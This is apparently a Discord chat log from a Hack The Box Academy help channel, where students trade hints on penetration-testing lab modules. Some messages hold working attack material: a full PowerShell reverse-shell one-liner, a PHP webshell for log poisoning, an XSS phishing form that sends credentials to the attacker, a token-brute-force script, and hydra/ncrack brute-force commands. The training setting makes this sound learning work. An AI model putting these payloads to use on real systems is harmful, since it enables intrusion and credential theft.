Us1nG_

greetings guys....

Hello for the Password Attack Lab - Hard, I successfully got the VHD and the password of it

however, how do i mount the vhd file?

I found the links from the HTB forum but seems like it does not work for me

😦

anyone who is using ubuntu 20.x and installed metasploit-framework via snap know how to install new plugins (due to the snap directories being read-only)?

Mount on a windows host

@fathom pendant Can I DM you?

someone know where can i download the xfreerdp??? i tied to install from sudo apt-get install xfreerdp and don't locatr the package

😩

We need a lmchatgptfy.com website

to counter the lmgtfy.com

tanks bro

👍

i just bought the .net and .org of lmchatgptfy 🤣

Google it

how do i upload the evil winrm? i used upload command but it's really slow 😦

Either windows VM or if your host system is windows...

Did anyone finish the Linux Privilege Escalation - Miscellaneous Techniques? I need a bit of guidance in that section as I am unable to understand the concept in "Weak NFS Privileges"

Morning all, I am new to Discord, not entirely sure how to use it 🙂 I am completely stuck on the bug bounty path. I cannot get the OWASP ZAP HUD to work! When I try to toggle the break feature it simply will not toggle to On, it is like the button just does not work. I have contacted support who are useless! Any ideas please?

First: don't say support is useless;
Second: what module are you having issues with specifically, what version of ZAP are you running

the module is using web proxies, the version of ZAP is the version installed on the pwn box. May I ask why not to call support useless? On this occasion, support pretty much dismissed my query like I was useless! Therefore my experience was not good! I am paying for a service and I feel the support is sub standard!

"I have contacted support who are useless!". Mate it's the weekend. chill out

Hi Guys. I'm struggling with the last Question i FUZZ Webapplication. I've have created my ids.txt file - and trying to get the answer.
Using the Parrot PC in HTB - is unuseable for my view. (some language/settings are really bad) when trying to use the online Parrot Version - So doing from a VM from home
The Results I'm having, I have either all or none of the Ids, and can not see /figure out how this should be solved.
So I looked in the cheat sheet - and verified that my command are the right one - and it is correct as I can see - But again getting all 1000 answer back or none. So i cannot not figure out this last command
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'KEYID=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -ft '<1000' which is the only difference in the 1000numbers in the output - Which gives me 10-20 number - but none of those are correct - so here I'm lost since I only see difference is Duration.
PS - interested in the right command to see differnece in this ? not the solution

ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:30437/admin/admin.php -X POST -d 'USER=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'

check if the parameter value is case-sensitive or not. If it is case-sensitive, then make sure that the words in the ids.txt wordlist match the case of the parameter value. you can try to use a different wordlist to see if you get any different responses

i hate my phone

Thanks - Since it was the parameter was found at USER (so the brain got stucked there)

MODULE: PIVOTING, TUNNELING, AND PORT FORWARDING skills assessment

Hi guys I found the vfrank creds and was able to connect to the other win machine with them, but I can only see the same flags..
Any help? Can I DM someone?

@sinful olive yes

seems to be working

try to fetch upload.php and read it.. understand the whole php file how the uploaded file is being saved and what filters are in place

everything you have read so far in the module is useful for the assessment apply everything

read content type filter section again

and apply that in the skill assessment you will get it

and don't get frustrated it took me 4 hours..

Well -still a bit struck here with these final flag - in the Module Fuzz Webapplications. so here its what I've done so far - after getting the right param and key.
The HINT - well its says its a flag in the HBT{VALUE} - reading the question - I thought the flag the would be in that response - when assigning the right param/key
Curl the admin.php with the right Param/keys --> Show same code as the webpage - but no flag her. and index shows 0byte in content.
My Scan for folders - didn't show any other folders than http://admin.academy.htb:PORT/admin/ --> no subfolders
A scan for extensions - shows for extension .phtml .html .htm .phps .php - but not found others than php
Did a discovery with directory-listening-2.3-big.txt & diretory-listening-2.3-lowercases-big.txt - only showing --> only showing admin.php and index.php. and index.php is empty
Did a recursion scan after flag - but didn't show anything else than index.php admin.php - Hmmm I Just can see what I'm missing here or where to find this flag here

XD

Hey Guys - any point direction would be well appreciated - since I can not figure out where the final flag are - The instructions/final question is that I should curl the answer But I'm just getting source - but I Can't figure this one

This is final question for find the flag in the FUZZ WEBapplication - There's no flag anywhere in this command
curl http://admin.academy.htb:31288/admin/admin/admin.php -X POST -d 'user=4' -H 'Content-Type: application/x-www-form-urlencoded'

It'll be section 505 - where the wqustion are: Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag?

Hi, I am just doing skill assasment "Password Attacks - Easy Lab" and I can't get into ftp. Nmap shows 2 services on the host (ftp and ssh). I did password mutation based on the list and rules provided in the module resources. Crackmapexec can't find anything, and bruteforce hydra takes ages (even after filtering out passwords that have less than 9 characters). Please give me some guidance.

I am in with this --> curl http://admin.academy.htb:31288/admin/admin/admin.php -X POST -d 'user=4' -H 'Content-Type: application/x-www-form-urlencoded' - But can't see/find the flag in that command -

yes - Getting it decapriated in browser - ann in the curl

So u are saying that such command should work?
ncrack -U /home/kali/username.list -P /home/kali/unique_long_passwords.txt -T 5 ftp://<ip>

in both Browser and curl - the only thing I can see it index and admin.php - but nothing in the index - and in admin.php - a ping show the right IP to look and the port is also up.
Have tried from both Mac and VM getting the same page - and have spawn the machine several the server a couple of times

Found thge name as USER yesterday - and had a hell today until where you talked about lowercase instead of the USER i Found Yesterday

Hmm it seems it didn't found anything ://

It'd be too easy and obvious but... let me try

It require user & pass

yup

So do you have any other ideas?

what about
ncrack -p 22 --user <username_list> -P <password_list> <target_ip>

Yes, im using mutaded pass list with username list provided in module resources

i did nmap -p- so i don't think there is something else

it defo isnt working, I am talking about the HUD that overlays a webpage and it has buttons on the left and buttons on the right. The green off button just will not turn to on. Do support not open at the weekend? They are not replying to my query, if they are closes then thats why.

not sure what you are meaning, but can you take a screenshot

Did you install the certificate? Pretty sure it doesn't work without it. Still, the hud is mostly useless, so I wouldn't even be bothering with it.

I did yes, the articles I am reading online also say its useless, I wanted to use it as I like the follow the articles in as much detail as possible, if I skip the HUD section of the module I feel I am cutting corners.

It's really just a slower way to do what you can already do through ZAP itself, and will clutter up requests. If you already understand how to do the same methods from just within ZAP, then you're not really 'cutting corners'.

and I say this as someone who exclusively uses ZAP, instead of burp.

ah ok that is good to know, thank you! Makes me feel better.

It definitely sounds like a good idea, but it just doesn't work great in practice. Most people seem to prefer burp to zap anyway, so if that ends up being the direction you prefer, then none of this matters anyway. 😛

yeah fair point

Anyone for this?

id:browse

to determine the FQDN of a third vhost, you would need to know the specific domain or server configuration

Can I dm you?

okay

you can typically look at the URL. for example
if the URL of the website is "www.123.com", then the FQDN would be "www.123.com".

I need a hint on AD Enumeration & Attacks - Skills Assessment Part I, has anyone finished this?

sure, what's the issue?

So I've looked through the history in chat here because I have the same issue regarding the Nessus Skills Assessment, and all I can say is from the results is that this module is complete shit. What do you do to login to Nessus?

here's the instructions,
Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100. Additionally, set up the scan to be authenticated using administrator:Academy_VA_adm1! as the credentials.

Authenticate to 10.129.202.116 with user "htb-student" and password "HTB_@cademy_student!"
What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word)

As you can see in the screenshots, nessus is not on the 10.x~ box, and I cannot connect to it from either a spawned instance or my box with vpn

no idea what you are talking about

Hey is there anyone self learning cybersecurity without any degree?

yea

Where did you start from I'm new to self learning cyber sec

tryhackme and HTB Academy

Mmm I'm just thinking about learning things for free

Tier 0 modules are free and there are free rooms on THM. but youre gonna want to get a cert of some sort and to go through that is going to cost something. youtube university is good but not this good

Youtube is free, Tryhackme is great for learning the foundations

htb is way harder and not as newbie friendly

@analog tendon how did you manage to get your "Academy user" role? 🤔 I cant find it in the academy site

Hey I was at Attack SAM section of the Password Attack modules I was trying to transfer the system.save file via imapcket's smbserver.py but it says it failed, but rest of the two security.save and sam.save were transferred easily since they were small in size any alternatives

good evening. attacking common services easy challenge. I got a username through smtp-user-enum tried hydra on all open ports. used the pw list of the resource tab and rockyou.
is brute forcing a pw the correct next step, and if so should i get a hit with hydra when i specify the username as f**** and the pw list rockyou on ftp?
thanks in advance.

if youre paying for the academy there is a discord token in your account settings around the OTP token

I see, thanks. Only paying for regular at the moment, too bad :p

I want to say the tokens are the same and once you pay for academy it shows up. but IDK only doing academy atm. i know it has my HTB rank but i dont remember if i verified it or not

I bought some cubes earlier so I think you need a real subscription. Saving up for the Silver one, its a tough price as a student but well worth it imo :p

agreed. i used my tax return to money to pay for the year. its gonna pay off

Glorious tax returns, maybe thats where I'll get my funding too lol

I seem to be stuck on the Passwd, Shadow & Opasswd section. I dont know if im going in the right direction or what the next move is. I found some ssh keys in one of the users hidden directories but these keys have a password and i cant seem to find that password. anyone know where to go from here?

Hello again people, i was doing the Password attacks Hard lab module but still having stuck with trying to hack Johanna's pwd (mut_password) and still having no results. Please can you give me a hint of how I need to start? I'd follow all steps to get results but in the last step the machine doesn't match any result or shut down cuz the time of indexation it's too long.

the password for that user is rather easy and can be found in the list you mentioned

Seems like you have to pass it 2john

sorry shouldve updated. i did do that and found the password to that. signed in using the ssh key but i am now stuck there. cant use any sudo and cant view those files still

Maybe that user has those bak files in a different directory

ill look ito that next. thanks for the nudge

omg i shouldve looked at that. i did see she went there in the bash_history

Yes, I know, but the procedure still executing with no results even following all the steps one by one.

Give yourself a break, come back and re-think if you can approach it differently or if there is something that you are not doing correctly, not every time (every exercise) the commands are exact the same

ok, I'm going to try another way

maybe that works

thanks

In the Web Attacks module, Advanced File Disclosure section, I'm struggling to understand HOW the error method works. Can anyone explain this in detail?

Basically, you will trigger the first XXE that will load the file (.dtd) that you are hosting which contains again XXE code, in the email field that you can manipulate you are calling the entity from your .dtd file which will execute the code

Hi Iam new can someone help me to know about server ..

oh sorry, you mentioned error method

for the error method if you focus your attention to the local dtd file think of it like it will execute from last to first

Hey everyone, I'm stucked at the File Inclusion Skills Assessment, I have found the ||access.log|| file but can't upload the php code to get command execution, can someone please help?

@everyone hey guys

Hi, I'm stuck on the "Attacking Common Applications - Attacking GitLab" module, I only have the user to find... the enumeration script works, it finds me 5 users, but not the one requested :/.

also, the given address (gitlab.inlanefreight.local) redirect to port 8180, while the gitlab is on port 8081, I don't know if it's supposed to be the case or if it's a mistake ^^

I'm on module 147 section 1327. It's the Password Attacks / Network Services section. I've answered the first 3 questions but I'm stuck on the last one. It's the SMB service. I've tried both Hydra and Metasploit. I can't seem to find the right username and password. Has anyone had an issue with this question?

hydra is a way but i used crackmapexec

I tried crackmapexec as well. I think the issue is that I can't seem to find the right user name. I looked in the user files of the machine I was able to rdp into and that didn't help either. Any suggestions?

are you trying one username at a time or using them within the list? if you run the list against the machien along with the pass list it should pop up

Okay, I'll give that a shot. Thank you!

Anyone who can help me with skills assessment on file upload attacks?

Pretty stuck on trying to get an initial footing, I'm not sure where my upload files go or how to figure that out. I did find the javascript code sending to upload.php, but not sure how that helps. I've tried to use a SVG / XXE payload to view the source to get the location, but unsure how to get make the payload work without being able to view the image. I wiped out the javascript/html error checking to push an SVG in, but I get an internal server error when I do that. Could presumably start trying to play with other types of attacks, but without knowing where the images are stored, even if successful I don't know how to execute them

Greetings everyone,

As a subscribed member of HackTheBox, I am an experienced SOC analyst seeking to enhance my abilities. After exploring the website, I am curious to know if HackTheBox offers any blue team content. Thank you for your time.

the academy has a couple of defensive modules. but if your experienced you may already have those down

When popping up the Impacket smbserver for the file transfers module - I'm not sure where this share is created. I run the command "sudo impacket-smbserver share -smb2support /tmp/smbshare" in the same working directory as I have the file I want to move, and then on the windows target I run "copy \<attacker_ip>\share<file_name>" and it gives me an error that the file was not found. Anyone know where the file to move needs to be located on the attack machine for the target to be able to grab it?

it creates it in the /tmp/smbshare folder

also blocking your code between `` like this will keep it from removing some of your \

because i take it you put copy \\attackerip\share\filename

Yeah thanks for that info

Ill try that

so if the file isn't in the /tmp/smbshare directory it's not found

you can create the smbshare in any directory with /path/to/folder or ./ which tells it to do it in this directory

How do you get started?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@fathom pendant Now with the smbshare created, I dont see anything within /tmp called smbshare, will I not see it?

then it's probably not a directory there

that's why (for practice) just do it in the local folder you have the file you want to transfer

Ah i see, the folder needs to be pre-existing, didnt catch that part. Thank you

and the file also needs to exist in that folder

:)

Got it - thanks again!

can i get help with smbclient and how to get the password.
i type in

"smbclient -U bob \ip\users

Enter workgroup\bob's password:

then what do i do next
If I press enter:
"session setup failed:NT_status_logon_failure

Getting started: Service Scanning

Try specifying the IP before the Username - smbclient \\\\<ip_address>\\$share -U <username>

that's not the issue

the issue is what do i type in or even get to a point I can type in smb:> ls

if I press enter It gives a logon failure

module: Footprinting , footprinting lab-easy . two questions, one, I tried different wordlists to brute-force the ftp credentials but all of them failed. So ended up using the hint. DId anyone was able to brute force this?. Question2, I had tried to access the ftp servers both port 21, port 2121 and without indicating port, but I can't run any cmds on it. I get the following : Does anyone knows how to bypass it.

so do I look at module footprinting?

what are you putting in for Bobs password?

The issue is I can't type anything it doesn't allow me to input anything for some reason

If you start typing a password when it asks you for the password - it wont show you actually typing in the password. Just type it in and hit enter

module: Footprinting , footprinting lab-easy . two questions, one, I tried different wordlists to brute-force the ftp credentials but all of them failed. So ended up using the hint. DId anyone was able to brute force this?. Question2, I had tried to access the ftp servers both port 21, port 2121 and without indicating port, but I can't run any cmds on it. I get the following : Does anyone knows how to bypass it.

@dim wigeon that work for you?

Guys it's been two days now, until this module I always solved everything and I'm a little desperate right now, if anyone helped I would really be thankful

nope it still comes up with logon failure

even if I input help, ls, > ls

Also thank Kraxxten btw for helping.

Im talking to people from HTB now and Ill see what they say

I may have an answer for you

If you still need it contact me in DM

yes please

Does the module give you a password for Bob?

Nope. You are supposed to acquire it and get through a file

https://academy.hackthebox.com/module/77/section/726

That module. Last questeion.

Did that work?

read the section carefully you are given bob's credentials

look for the green text

MarcieLee can you help here?

i haven't done file inclusions

Ok thanks anyway

Yea thats what the guy from HTB said. Working so far

sup guys. can anyone tell me what is exactly the "lab exercise guidance" on the silver annual subscription

Anyone assist with this pass the hash. last question getting a reverse shell from DC01 to MS01. ive gotten the command for the powershell to send the shell and respond as expected but my listener doesnt show a connection. ive verified im using the internal IP. verified the ports. have the listener running constantly and ive used the different versions of the powershell reverse payload using base64 encoding

your looking at it buddy. but you can also hit request help on the questions if your having trouble and one of the guys will DM you

ooh thanks... I was thinking it would be kinda a individual help they'd provide

they do if you request it from the course questions

but sometimes its faster to ask some people who have already been through it

not everytime jsut sometimes

do you know if any of the monthly subscriptions comes with direct access to all tier 2 modules?

or just the student subscription

silver annual

but no monthly

monthly uses cubes

so al a carte

that silver annual is too expensive to my wallet lol

expensive. yes. worth it? depends on how you look at it but i say yes

dont know if it is actually worthy it

silver annual also gives you a ticket for an attempt at the exam

I mean ... maybe it is better to invest on cubes and the certification separately

annual also comes with a voucher for an exam

it can be depending on how long it takes you to get through the course

i have a life and kids so i cant always go through this stuff so having a whole year to be able to go through works for me

h0gbyte maybe you can help here, I'm going crazy with this File Inclusion module

Hey all. I'm working on the sqlmap module's skills assessment and I'm a bit confused. As far as I can tell, there aren't any forms or other inputs that actually process input data, just a bunch of dummy forms. Am I on the wrong track or just missing something obvious?

i havent been through that part just yet. but it is local or remote? from your question im assuming local

try to mess around with the ||/proc/self/environ||

It's the last section, skill assessment and yes I'm trying local

Will do

Thanks

I think i will go for one of the montly sub and buy a exam ticket separately :/

you can also just buy cubes

instead of pay monthly

yeah

https://giphy.com/gifs/giphyqa-FhbukHmFBiMzC

¯_(ツ)_/¯

can u share the section link?

https://academy.hackthebox.com/module/147/section/1638

but it would be more expensive ... i can use subscription while I do all of the pentest path and then cancel the sub if i wont do any other course

yea. i considered it myself but figured annual would be better for me. plus tax returns helped me alot

yeah... anyway.. thank u guys. I will give it a lit bit more of thinking

get back tou you when ive decided

who knows i get a financial aid from my company lol

can u share the shell youre using?

or

specifically the command youre using

after loading the Invoke-TheHash module i used the Invoke-SMBExec <target info> then this command from the reverse shell generator

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("172.16.1.5",8001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

of course base64 encoded and ive tried just about every flavor

i would have pasted the actual command but time ran out so my connection closed

are u using invoke-wmiexec?

WMIExec doesnt go through

is this the server for that?

Unfortunately nothing we can do homeslice just make a new account

Or contact Spotify support

#rules

mine worked with wmiexec

https://giphy.com/gifs/no-bugs-bunny-fXnRObM8Q0RkOmR5nf

Ill try it again. it just didnt respond the first few times but smbexec did

Did you meen from the ||ilf_admin|| page or the normal one? In the first I don't seem to get anything useful

when using wmiexec it gives me the "Process did not start, check your command" response

In the second I get "invalid input detected" but haven't tried all the bypasses from the lessons

you might be using the wrong command

dm me if u cant get it

i would say its a bit outside of the module

the Invoke-WMIExec?

or the reverse shell

ive tried with 4 different reverse shells

all powershell though

Yes, I have done this. I was using port 443, since it is a commonly used port. Maybe ill try using other ports?

wmiexec

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File Inclusion#lfi-to-rce-via-procfd

try the /proc/self/environ from there tho u need to change things a bit

try to do the wmiexec properly and i used the base64 shell

dm me if u cant figure it out

i got it. and im about to punch my monitor for missing something so small

I change the ||user-agent|| right?

i didnt put the command in the " "

yeah

that happens

i know

usually i would think of it but for some reason it just slipped me. thanks though

i was stuck in a skill assessment for 6 hours cuz i missed a "&"

shiiiit

np anytime

But where do i put the actual command? right after the ||environ as in environ&cmd=id||

try to find where the output gets displayed

Ok I'm on it

Still nothing, doing all this with burp is right? I'm starting doubting it

Read through the section in the module relevant to your question again and you'll find the piece you are missing

How about no

Fuckin Snapchat scammer

booted

I eventually figured it out. In case anyone else gets stuck, keep looking for page functions that do interact with the backend.

From where i can lear ethical hacking

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@craggy forge ^

hey sorry i went to bed dm me

I saw the example online, some people use meterpreter> and I use msf>, I want to ask if it is not started with msfconsole?

lmao

meterpreter means that u got a session ,shell of the targeted system , that means u can run commands

meterpreter is a attack payload which provide a interactive shell ,

to the attacker from which to explore the target machine and execute code

That is, if I get a reverse session now and I'm using it, then my shell will become a meterpreter and I can use the responding commands, right? @rustic sage

like if u got a linux system reverse shell u can only run linux commands , as if u got a windows system reverse shell u can run windows commands

i hope u understand

I think I get it, thank you very much for the explanation, it's really easy to understand! @rustic sage

thanks Are you attempting to pwn machines right now on HTB?

Let's try and keep this channel on-topic of the modules for htb academy

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

general chat?

You have to verify your main htb account in #bot-commands to access it

As stated in #welcome

Yes, I'm still learning. There are just some details that I didn't thoroughly understand at the time of study. @rustic sage

What happens after you run mstsc.exe from the an elevated cmd prompt and then run

netstat -na | findstr /c:"3389”

aah nevermind , best of luck

Is there a process to submit (typically minor) issues with HTB Academy module content?

#858470491676737536 and check the prior messages for the format

any hints on windows privilege escalation skills assessment II question 2? Escalate privileges to SYSTEM and submit the contents of the flag.txt file on the Administrator Desktop

How can I move a file from Windows to my local system? python -m http.server doesn't work

use rdp with network drive ::

xfreerdp /v:10.129.211.17 /u:'htb-student' /p:'HTB_@cademy_stdnt!' /drive:linux,/home/kali/ctf

Thanks!

And if rdp isn't enabled?

• sudo impacket-smbserver share -smb2support /tmp

copy "\192.168.220.133\share\nc.exe"

Thanks!

If you're using evil-winrm, you can use the command 'download'

Thanks for this. I copied it from the target machine and used echo -n 'asdfasdf' > hash.txt to add it to a file without newlines

im still stuck on the ||imap|| section of footprinting hard lab, im in||tom's email|| and there are ||4|| folders, i used ||A1 FETCH 1:* (FLAGS) and A1 UID FETCH 1:* (FLAGS) || they all either return an error on nothing, i have no clue what to do, is there a second community maybe? the forums didnt mention anything about it.
the only notable return was in ||inbox, a1 fetch 1:* (FLAGS) returns this 1 FETCH (FLAGS (\Seen)), i tried to A1 FETCH 2 body[] and it returned just errors|| i would appreciate it a lot if someone could help me a little

what is the error

||A1 BAD Error in IMAP command FETCH: Invalid messageset (0.001 + 0.000 secs).||

@subtle glen https://www.atmail.com/blog/imap-commands/ go to this website an look at the fetch section

use one of the rfc

thats what i did

How do I log onto another computer in AD?

PSRemoting?

Struggling on the really easy stuff as usual.
Broken Auth - Weak Brute Force Q2

It seems like we should be using a X-Forward 127.0.0.1 with the brute forcing thing....not understanding why this isnt working and what I might be missing in my understanding of whats wanted here.....seems very straight forward and obvious

headers = ||{"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36","X-Forwarded-For": "127.0.0.1"}||

Got it.....im dumb.......

guys can I run hack the box in windows ???

I am young

pls help me

not recommend

especially for someone who is starting out

do I need to use linux only

preferably

But I cant do it ... my father will kill me

and I am interested to learn

https://www.kali.org/docs/usb/live-usb-install-with-windows/

Hi ! I am working on Windows Privilege Escalation Skills Assessment - Part I

I can't find a way to make the potato works, tried everything i could think of ! All the CLID found by my scripts failed

Can someone help me ? That's the first time I encounter this much issues with a potato

Please Help Me i need Help in Windows Privilege Escalation Skills Assessment - Part II

if Any one Completed This Module Please Dm me

🥹

In the password Attacks Credential Hunting Linux i tried brute forcing every service with every username and password that is from the rescources list

but i cant get in

Balena etcher?

what?

What's the actual question here?

what am i doing wrong ?

or a hint

delete first 70k entries

which section are you working on

than it shouldnt e that long to brute force

this should help

Why first 70k? I've seen most people do first 17k not 70

oh or 17k my flaut

or filter out words starting with 'B' and use them

yeah it should start with a b

B

But coming back to my problem on credential hunting in linux: i cant get on the machine i brute forced every service but nothing is working. Maybe someone can push me in the right direction

is that from ad enum and attacks module

No

no password attacks

Pass attacks

You've used the mutated wordlist yeah?

have you checked the hint as well?

no, i should try that

yeah i checked the hint but the credentials dont work

Thats a password that you can mutate

The hint is to help you make a narrower pw mut list

So again this seems to insanely easy to fuck up but here I am. Breaking Authentication - Predictable Reset Token

We are copying a linked cve which is (username+epochtime) encoded with md5 and submitted.

But they exist within the large list

Like i dont get how I could spend this long doing this and just getting wrong answers

We have a time stamp.....

We have a converter to epoch time ......

We have md5 hash generator.....

We have somehow gotten the wrong answer.......

Vendor: The Apache Software Foundation

Versions Affected: Apache OpenMeetings 1.9.x - 3.1.0

Description:
The hash generated by the external password reset function is
generated by concatenating the user name and the current system time,
and then hashing it using MD5. This is highly predictable and can be
cracked in seconds by an attacker with knowledge of the user name of
an OpenMeetings user.

All users are recommended to upgrade to Apache OpenMeetings 3.1.1

Credit: This issue was identified by Andreas Lindh


Apache OpenMeetings Team```

thanks guys that worked

am I just having a formatting problem I dont understand what can possibly be wrong here when its so laid out....

Has anyone finished AD Enumeration & Attacks - Skills Assessment Part I?

Just use a goddamn .bat shell ....

Hello guys i am having a problem with this module
https://academy.hackthebox.com/module/31/section/390

When i try to run this command in the debugger
run $(python -c "print '\x55' * 1200")
I get this error

Starting program: /home/gem/bow32 $(python -c "print '\x55' * 1200")
File "<string>", line 1
print '\x55' * 1200
^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0xf7e1df2c in ?? () from /lib32/libc.so.6

This is because in Python3 print uses () and here is without but i cannot find a workaround...
Can you help

Hi all
I tried to complete the skills assessment in the pivoting,tunneling module
I am stuck after getting the lsass file and discover the user v**** but impossible to crack the hash with classics wordlists.
I discover the second server with the IP 172.16.6.* but impossible to log in rdp with mlefay (and in dont have the v*** 's password ^^)
I also tried to set a netsh on the first windows srv but nothing work…
Please if someone can help me it will be very apreciate 🙂

Thanks

Take a closer look the password may be right in plain sight

the melfay pass ?

The v*, you dumped the lsass/secrets yeah?

yes

i found a NT hash but impossible to crack

i dump manualy the lsass and read it with pypykatz

oh damn !!!!!!

What happened!?

thanks !!! why i missing it when it is in the middle of my face ^^

sorry ^^ just fond the answer i am looking for since 2 days and it was juste write in the middle of my screen

Most frustrating thing in the world to have what needs to be done explained and then you follow it and are told you're wrong

aaha

Hi,
I think i have a problem with the password mutation section in password attacks module.
I created the mutation of the word list but since this morning it is running, I had to restart the machine many times.
There is no complexity at this level and i use the lists given in the resources
Here are my commands:

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

hydra -l sam -P mut_password.list 10.129.128.227 ssh -t 4

I lost another whole day for nothing on brute force...

-t 4 is default , u dont have to use this default value i would say

Ok thanks I restarted without this option but I'm afraid the server will stop the connection for too many bad attempts

no no -t 4 is decent

and server is powerfull enough

server can handle request

I don't have FTP server on the machine.
Are you talking about this section?
https://academy.hackthebox.com/module/147/section/1391

can anyone provide me the best worldist for subdomains enum?

Oh yes, sorry, I got confused with the nmap in the previous section ...
Well, I'll try again in ftp because yes it's too long in ssh.
It's really a problem to waste so much time for brute force or we learn nothing.

Try a different service

Ssh is super slow and forces a 4 thread

I'm on the ftp and I got a little hint that reduces the brute force to 10min.
So normally it will be good quickly!

Academy - Windows Privilege Escalation - Pillaging
I'm having difficulties to submit the Administrator hash .. I restored the back up files and dumped hashes using samdump2 and got the administrator hash but whenever I submit it .. It's wrong

In the Documentation and Reporting Module, under resources these is a .ZIP file with a sample report. I either missed the password for it or it is not listed. When I go to unpack the zip it asks for a password. Can someone help me out with that password? Thank you!

I just completed I used ftp with 64 threads ,4 is too slow

samdump2 gave different hashes than running secretsdump .. solved

but i want to know why ?

Yes is good i found it !
Thanks for reply

hi guys i am in "password attacks module : Attacking lssas " .. when i am using "pypykatz lsa minidump /home/htb-ac698971/lsass.dmp" it says bash command not found. I tried installing pypykatz it gives a lot of error. Can someone help me?

what kind of an error are you getting when you try to install it

I shared you ss on personal chat

hey guys idk how to conect wifi to my workstacion i cant open firefox

if you are a free user, then you don't have access to the internet on the workstation

Hi folks, last couple of times whenever i spawn target machine, it generates some random pub IP with a special port, is this new change or what? i cannot ping it or access it

thats a docker target which can be accessed over the internet, you need to think of a better approach than to ping it

you can access it in a browser

I cannot get a valid return and dont have any idea why

would love some help if possible

import requests
from sys import exit
from time import time
import datetime

url = "http://<IP>/question1/"


   
now = int(861000)
start_time = now
fail_text = "Wrong token"
user="htbadmin"
endtime=now+1500

for x in range(start_time-1500, endtime):
    raw_data = user+str(x)
    md5_token = md5(str(raw_data).encode()).hexdigest()
    data ={"token":md5_token,"submit":"check"}

    print("checking {} {}".format(str(x), md5_token))

    res = requests.post(url, data=data)

    if not fail_text in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()


exit()```

(6 hours on this single question) Have read throug hthe Broken Auth thread and still no juice

Thanks. Spent about an hour on this, but with your comments, i knock it out in five secods.

You ever figure this out?

hey guys where is the password for Kerberoasting module

i have not been able to login with GetUserSPN

The password file comes in handy in a later section

I feel like my password file is messed up. If you still have it, would you mind sharing the sha256 hash of yours?

Not at my computer ATM, but which file do you mean? The password.list from the resources?

No worries, I meant the mutated password list

Hello can i ask a question regarding XSS Phishing module?

I am using this xss payload provided from the module

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

however i kept getting ');'> at this end

is there any problem with this?

If you mutate the password from the custom.rule from resources you should be fine

if you're trying to phish a user you might not want that visible. you can rectify this by ||starting a comment at the end of your payload||

ty! i was able to solve it 🙂

yo in Attacking Enterprise Networks

i need some help

on the Active Directory Compromise part.

having problems with a tool. need help asap 😋 🙈

nvm got it

got a workaround

anyone can help me out on the osticket part of the attacking common apps module?

idk why the exploit chain just not clicking for me

idk what they are looking for here

did you get this?

No

It runs but it doesn't stop/ find anything

Driving me nuts

can i dm you

Yea

@acoustic owl maybe?

Don't just ping people randomly dude

👍

Depending on how long you've been working on it take a step away and come back later

i can't tell if it really wants me to dehashed.com inlanefreight.local or not

Hey all, thoroughly enjoying the penetration tester path. Can’t imagine a better education. I had a question on “Attacking Common Services” module, “Attacking RDP” section for anyone who knows the answer. For a PtH attack, is it possible to enable Restricted Admin Mode before gaining access to the victim host in any way? Or is it only something done after, using an alternative protocol like SSH, etc and then RDPing over 🙏🏼

si

from my understanding as long as you have some RCE enabled you can do it

you don't need a shell or a login

could be enabled through a webshell

(evil) WinRM

Password Attack : Lab Medium
I just cracked the password of the docx file, How do i open the file in my linux box with that information?

i used kali linux and got libre office

on pwnbox i dont know

Footprinting module lab easy. || ive connect to the ssh server with the provaye key i got off the ftp server, but I cant find the flag.txt on the ssh server and ls, dir, etc. Return nothing||

Nvm

Found it

wow.. All this time I thought i had libreoffice in my vm, it was actually never there and no file will open

https://tenor.com/view/loli-cute-facepalm-slap-anime-gif-16637534

hahaha

you need get it on kali linux

dude... all this time

yea .. i thought it comes by default with kali

sudo apt update
sudo apt install libreoffice

yea just installed it. thanks

Can someone tell me a story about how they were doing good then suddenly came up against a wall and felt like they were stupid for having to use hints or ask on discord often then eventually became better and is now an op l33t h@x0r?

https://tenor.com/view/pepe-cry-reading-pepe-the-frog-sad-gif-17607942

ask me next year

I am having a ton of trouble with the final assessment for File Inclusion / Skill Assessment

I am attempting to poison the logs in burp and can see that I can write a user-agent, but after that when I go to put this into the user agent.

||<?php system($_GET["cmd"]); ?>||

and this for my get statement

||```
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=id

Nothing shows up

has to do with quotes

play aroudn with your quotes ont he payload it breaks it sometimes.

I also did single around cmd

quote the entire thing

look at how the useragent is being logged

Ok thanks

Cooking dinner now lol get that after

How far are you in this lab?

